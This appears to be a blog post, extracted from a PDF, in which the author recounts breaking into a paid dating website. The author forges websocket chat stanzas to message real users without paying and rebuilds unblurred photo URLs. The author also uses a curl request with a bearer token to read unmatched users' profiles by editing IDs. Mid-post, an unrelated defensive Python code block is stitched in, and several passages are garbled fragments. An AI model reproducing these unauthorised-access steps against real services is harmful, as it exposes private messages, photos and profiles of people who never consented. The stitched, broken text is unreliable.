1 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Disclaimer:
I am not a fan of online dating, nor do I have any online dating apps
installed on my devices. I have tried a few of the most famous online
dating apps and they did not appeal to me. I love approaching
people anywhere and saying Hi.
This dating website charges more than £50 per month to be able to
see photos and to message people. That surely is because they are
providing such a smart service.
The dating website does not even allow you to read the message. So I
thought: Hmm, let’s see how smart these “smart” people are.
Well I can see the profile and every detail she has entered about
herself. Kinda creepy, but okay, anyway this kind of shows on the
application. But wait, did they just send the girl’s full profile
over non-secure HTTP? Hmm…
I said, well if the iOS application is a bit hard to hack, let’s try the web
application. I headed over to their website and logged on. I could almost
see the same interface, same blurred faces, same inbox which I
cannot read.
[
  {
    "messageId": "b123738-5123-4123-9123-1232333b1234",
    "type": "CHAT",
    "value": "Hi Zed! I feel like I should send an interesting message but I'm all Mondayed out. How are you?",
    "createdTimeStamp": 1523914585468,
    "readTimeStamp": 1523914778123,
    "sender": false
  },
  {
    "messageId": "ABC1235C-AABC-4ABC-8ABC-1ABC4EBC7ABC",
    "type": "SMILE",
    "createdTimeStamp": 1523883156123,
    "readTimeStamp": 1523886591123,
    "sender": true
  }
]
Okay, well cool, but still I cannot pinpoint who this person is, nor
reply back. Since we got this far, probably we can go even farther.
If I need to send a message, then the first thing I’d have to do is to see
what sending a message looks like. So I switched to any other
person there is on my match list, clicked on the button to send a
pre-defined message, selected one of them, “If you are famous, who
would you be?”, and sent it out.
Okay, looking over the PUT and POST requests that we just created, I
cannot find the word “famous” anywhere. Is it that the word does not
get sent, or is there something else going on?
In one of the POST requests that happened after I sent the message,
the payload was:
{
  "logs": [
    {
      "logMessage": "Message Sent (Soft ACK) - on server sender",
      "method": "WEBSOCKET",
      "logLevel": "INFO",
      "additionalInfo": "{\"messageId\":\"12351f23-fABC-4ABC-9ABC-ABCc123a0ABC\",\"matchId\":12309078132}"
    }
  ]
}
Damn, “famous” also does not exist in the websocket. Looping over
the messages trying to understand the XML being sent (who the hell
uses XML these days for websocket communication?), it looks like
it is:
• Opening a connection
<message xmlns="jabber:client" to="123jnwrvd7_123gd2abcv12_12@chat.xyz.com" id="84123ff6-f123-4123-9123-c123458a0abc" type="chat">
  <body>{"message":{"messageId":"84123ff6-f123-4123-9123-c123458a0abc","type":"CEQ","value":"62"}}</body>
  <request xmlns="urn:xmpp:receipts"/>
  <data>
    <accesstoken>84123ff6-f123-4123-9123-c123458a0abc</accesstoken>
    <header name="User-Agent" Safari/537.36"/>
    <header name="X-xyz-gdid"/>
    <resourceid>12309078132</resourceid>
  </data>
</message>
Awesome, now since I understand how the sending works, let’s try to
replicate this.
• Authenticate. Good.
Hah, that’s easy. Okay, how do we send a message now to this match?
{"message":"Hey There!"}
Aaah, error.
xmlns=’urn:ietf:params:xml:ns:xmpp-stanzas’/><text
method
at [Source:
org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$Un
reference chain:
com.xyz.services.comm.api.message.ClientMessageWrapper["message"])</text></error></message>
I opened the list to send more messages and I inspected the HTML
and it turns out that that message has the ID 62.
Ah okay I see where I went wrong, messageId is some other ID, while
the value is 62 for the pre-defined message. What about type “CEQ”,
what should I set that to?
I see what to do now, just set the type to CHAT, and the value to my
chat message. Let’s try it out.
Response:
y27r7c8tjky@chat.xyz.com/android.phone.emulator’
to=’1231232yr2_3–6sgyt-
c612337t@chat.xyz.com/android.phone.emulator’ xml:lang=’en’
id=’123f7–32' type=’chat’><data/><received
xmlns=’urn:xmpp:receipts’ id=’81231236-f5ce-abcd-
9abc-c6e12312312c0'/></message>
to=”123jnwrvd7_123gd2abcv12_12@chat.xyz.com”
Copy the extended profile information to Sublime Text. Find the chat
address in text. Ah, it is the encrypted user ID. Okay, let’s try that.
{“message”:{“messageId”:”84123ff6-f123-4123-123b-
Well that was a fail, I sent it to the same girl that I tested on. Hah.
Shouldn’t have added the name, it’ll look super weird now…
Weeeeellll. Let’s try again.
After a long look at all these IDs and chat addresses, it turns out it is
the resource ID:
<resourceid>12309078132</resourceid>
Trial number 2:
Find what that resource ID is. Okay that’s the user ID that’s not
encrypted. Easy peasy. Edit the resource ID, and voila. We have a
message sent to the cutie!
I started thinking, well this is getting fun. How about we try to see
those blurred photos now. In the profile JSON array, there is a list of
photos, and the URLs look as such:
https://images.xyz.com/photos/v2/photo/NORMAL/I1/d5abcttnp5yxjytb227v6fp56p.jpg?blur=60&crop=faces&fit=crop&g=2&h=160&ixlib=java-1.1.1&w=160&s=cda2e652b4182b123a1f5f6781daa36a
I was thinking, maybe if I have a paid account, then I can see how I can
map the blurred images to the original images. Well I’m not really
gonna do that.
Well just check my own profile picture, what does the URL consist
of?
In fact I did:
https://www.xyz.com/photos/v1/photo/THUMB/I3/1236VKj18jtm5Ih8Cr2pSAabc.jpg
https://www.xyz.com/photos/v<version>/photo/<SIZE>/<IMAGE-NUMBER>/<ENCRYPTED-USER-ID>.jpg
That’s easy, let’s apply that to another match’s image. And voila,
we’ve got the image there.
Okay let’s check how insecure this is. Can we read other people’s
profiles without even being matched to them? Let’s see.
https://www.xyz.com/publicapi/v2/matchprofile/<match-id>/profile
curl 'https://www.xyz.com/publicapi/v2/matchprofile/12303942525/profile?' -H 'authorization: Bearer 12339f23-2302-4e6f-b9ae-1f9c99a6e123' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,ar;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS
Alright, let’s change one number of the match ID, and see if we can
get data.
That’s good. Can we get those profiles though using a user ID? I
cannot see how we can do that now. No problem. I won’t waste more
time on this, my point’s proven.
Moral of the Story
I am not a hacker, nor do I want to cause damage. I just understand
how web services work. The reverse engineering I just did is 99%
done on Chrome without the need of any other tools. Gaining full
membership features to a service that charges so highly was so easy
as most of the security was done at the frontend, not the backend. It
is a high-walled castle with an open gate and no guards inside it.
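The backend checks whose absence is described above, sketched as an added example that is not from the original post or the site's code. The entitlement rules (free accounts get no message text, no free-text CHAT messages and no original photo references) and every name below are assumptions made for illustration.

```python
# Added example; types, names and tier rules are constructed, not the site's.
from dataclasses import dataclass, field

class Forbidden(Exception):
    """The authenticated caller may not perform this action."""

@dataclass
class User:
    user_id: int
    paid: bool = False
    matches: set = field(default_factory=set)  # user_ids matched with this user

@dataclass
class Message:
    sender_id: int
    recipient_id: int
    type: str  # "CHAT", "SMILE" or "CEQ", as in the captured payloads
    value: str = ""

def require_match(caller, other_id):
    # Object-level check: an ID in a URL or stanza is only a lookup key,
    # never proof that the caller may touch that object.
    if other_id not in caller.matches:
        raise Forbidden("not matched with this user")

def get_profile(caller, match_id, profiles):
    require_match(caller, match_id)
    profile = dict(profiles[match_id])
    if not caller.paid:
        # Withhold original photo references instead of blurring in the client.
        profile.pop("photos", None)
    return profile

def read_inbox(caller, inbox):
    mine = [m for m in inbox if caller.user_id in (m.sender_id, m.recipient_id)]
    if caller.paid:
        return [vars(m) for m in mine]
    # Free tier: metadata only; the message text never leaves the server.
    return [{"type": m.type, "sender_id": m.sender_id} for m in mine]

def send_message(caller, recipient_id, type_, value):
    require_match(caller, recipient_id)
    if type_ not in ("CHAT", "SMILE", "CEQ"):
        raise Forbidden("unknown message type")
    if type_ == "CHAT" and not caller.paid:
        raise Forbidden("free accounts may only send pre-defined messages")
    # Sender identity comes from the authenticated session, not the request body.
    return Message(caller.user_id, recipient_id, type_, value)
```
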
websocket.
Remember that with GDPR, you can request a copy of your data in
human readable format from any service provider, and that this
request must be fulfilled in 72 hours.
Once news about companies being fined starts to come out, companies
will start employing practices to secure their systems. After all, it
seems that only 27% of businesses thought that GDPR applies to their
business, and half of UK’s businesses know about GDPR.